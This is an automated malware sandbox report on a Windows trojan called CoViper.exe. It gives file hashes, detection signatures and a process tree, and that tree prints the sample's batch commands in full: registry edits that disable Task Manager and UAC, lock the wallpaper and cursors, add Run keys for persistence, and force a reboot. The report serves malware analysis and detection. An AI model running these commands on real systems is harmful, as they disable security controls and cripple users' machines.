Analysis

  • max time kernel
    12s
  • max time network
    64s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    09-05-2023 19:16

Errors

Reason
Machine shutdown

General

  • Target

    trojan-leaks-main/CoViper.exe

  • Size

    286KB

  • MD5

    e20ee9bbbd1ebe131f973fe3706ca799

  • SHA1

    4e92e5cbe9092f94b4f4951893b5d9ca304d292c

  • SHA256

    f632b6e822d69fb54b41f83a357ff65d8bfc67bc3e304e88bf4d9f0c4aedc224

  • SHA512

    d50524992662aa84d5b4340525a25d915e91e464a725aa6851de206fd294aa7f4fcefe695ce463ce652b0a03874b75c0678b4c708d2b71f7c18804d1365d3458

  • SSDEEP

    6144:egtJZ0NSt7Jb/Is8vIfYg6KcZQV7GdRMrKUIvcgfoS3Qz89r:egWNStd7R8cYgsZK7qCrqfoS3Mcr

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Disables Task Manager via registry modification
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 6 IoCs
  • Modifies registry key 1 TTPs 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 52 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\CoViper.exe
    "C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\CoViper.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1268
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\C572.tmp\coronavirus.bat""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1812
      • C:\Windows\SysWOW64\attrib.exe
        attrib +H C:\COVID-19
        3⤵
        • Views/modifies file attributes
        PID:820
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v disabletaskmgr /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:628
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        • Modifies registry key
        PID:332
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v wallpaper /t REG_SZ /d C:\COVID-19\wallpaper.jpg /f
        3⤵
        • Modifies registry key
        PID:320
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:1872
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKCU\Control Panel\Cursors /v Arrow /t REG_SZ /d C:\COVID-19\cursor.cur /f
        3⤵
        • Modifies registry key
        PID:432
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKCU\Control Panel\Cursors /v AppStarting /t REG_SZ /d C:\COVID-19\cursor.cur /f
        3⤵
        • Modifies registry key
        PID:964
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKCU\Control Panel\Cursors /v Hand /t REG_SZ /d C:\COVID-19\cursor.cur /f
        3⤵
        • Modifies registry key
        PID:1788
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v CheckForUpdates /t REG_SZ /d C:\COVID-19\Update.vbs /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:1696
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.exe /t REG_SZ /d C:\COVID-19\run.exe /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:1940
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\software\Microsoft\Windows\CurrentVersion\Run /v GoodbyePC! /t REG_SZ /d C:\COVID-19\end.exe /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:1644
      • C:\Windows\SysWOW64\shutdown.exe
        shutdown -r -t 5
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1392
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x0
    1⤵
      PID:1664
    • C:\Windows\system32\LogonUI.exe
      "LogonUI.exe" /flags:0x1
      1⤵
        PID:1004

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\C572.tmp\coronavirus.bat

        Filesize

        1KB

        MD5

        e9b2f5e9305dc2a39258d69264647c53

        SHA1

        87653e2ba1bf810feb472391cef4ffae82e38ea9

        SHA256

        4fd9b85eec0b49548c462acb9ec831a0728c0ef9e3de70e772755834e38aa3b3

        SHA512

        7b0ff3dde5ba6d098f970a8d09c690652607cb3f8806b942922f7b92df45b4cc788f13dd376b6d48404178a5462baddafbb61b893074b42dbf14836826af9881

      • C:\Users\Admin\AppData\Local\Temp\C572.tmp\coronavirus.bat

        Filesize

        1KB

        MD5

        e9b2f5e9305dc2a39258d69264647c53

        SHA1

        87653e2ba1bf810feb472391cef4ffae82e38ea9

        SHA256

        4fd9b85eec0b49548c462acb9ec831a0728c0ef9e3de70e772755834e38aa3b3

        SHA512

        7b0ff3dde5ba6d098f970a8d09c690652607cb3f8806b942922f7b92df45b4cc788f13dd376b6d48404178a5462baddafbb61b893074b42dbf14836826af9881

      • C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\Update.vbs

        Filesize

        156B

        MD5

        bfbafdf20dadf4e83476228f2f86e80c

        SHA1

        fcc31feb12f3ccd786b17d46c5f487c22ea74a38

        SHA256

        a1a8d79508173cf16353e31a236d4a211bdcedef53791acce3cfba600b51aaec

        SHA512

        157ba2aaa5bd715119381a593ec78ac83f2e2e35512764ec99878cd4019d87837bb96457cb2de5e64df1510cf2935aa91918c27e686a2451c095bbbaedc84321

      • C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\cursor.cur

        Filesize

        13KB

        MD5

        21f48a9e113317b8e2b3ce5366621aa1

        SHA1

        674c0fc07675d3455780690c38f25f6fbd20b401

        SHA256

        13c4423ed872e71990e703a21174847ab58dec49501b186709b77b772ceeab52

        SHA512

        50b99a9e44b3fefce32ad729048d8491cfa403425efe84c48038ab97dbdb403fbe35dfd50a82018d180144e1c84243622f45a2b11a06e6f105f13636fff7d75b

      • C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\end.exe

        Filesize

        47KB

        MD5

        7def1c942eea4c2024164cd5b7970ec8

        SHA1

        b2f4288577bf8f8f06a487b17163d74ebe46ab43

        SHA256

        c3f11936fe43d62982160a876cc000f906cb34bb589f4e76e54d0a5589b2fdb9

        SHA512

        87b023b8550fcb7b7948b33eb76dd8e22452669fba280b384bc2c2162d908eaa95cdac3f31136bc2aed07944cebdc22bce34f2a96ce4f40353645f5a2a94f5ce

      • C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\mainWindow.exe

        Filesize

        148KB

        MD5

        e6ccc960ae38768664e8cf40c74a9902

        SHA1

        d29cbc92744db7dc5bb8b7a8de6e3fa2c75b9dcd

        SHA256

        b780e24e14885c6ab836aae84747aa0d975017f5fc5b7f031d51c7469793eabe

        SHA512

        a3a7fa630bafa9508b78af298893733b365e4a185a47b231fb0bfdffc4ed2adacbdbc65fd8261cdd8a589998590a82416cb21200e0eed1bcef67b7655c9b101d

      • C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\run.exe

        Filesize

        21KB

        MD5

        b1349ca048b6b09f2b8224367fda4950

        SHA1

        44fac7dd4b9b1ccc61af4859c8104dd507e82e2d

        SHA256

        c46c3d2bea1e42b628d6988063d247918f3f8b69b5a1c376028a2a0cadd53986

        SHA512

        f1cc8116d6eb91e6ecb214ac647c7a9a4ca7d2733af3bbca68939722c11e61a33213aa8c1cc6024c0f186db9edca48006f8f13d3282c7be921b3246cba975810

      • C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\wallpaper.jpg

        Filesize

        1KB

        MD5

        087f4545e13bd7b8e1f36c941a62f8a4

        SHA1

        f43ac7023ca49efe5509993667f04c2fbf6ac722

        SHA256

        4a17f58a8bf2b26ece23b4d553d46b72e0cda5e8668458a80ce8fe4e6d90c42d

        SHA512

        8b309437fb43ce8667ead9709fd5700b719ee46bd294c4ee4b554cd064de63b3d5165bac83e349c54491a97c8f2241dc29f92f586c5ef50689b681386dc07c31

      • memory/1004-83-0x0000000002820000-0x0000000002821000-memory.dmp

        Filesize

        4KB

      • memory/1268-80-0x0000000000400000-0x0000000000473000-memory.dmp

        Filesize

        460KB

      • memory/1268-81-0x0000000000400000-0x0000000000473000-memory.dmp

        Filesize

        460KB

      • memory/1664-82-0x00000000027C0000-0x00000000027C1000-memory.dmp

        Filesize

        4KB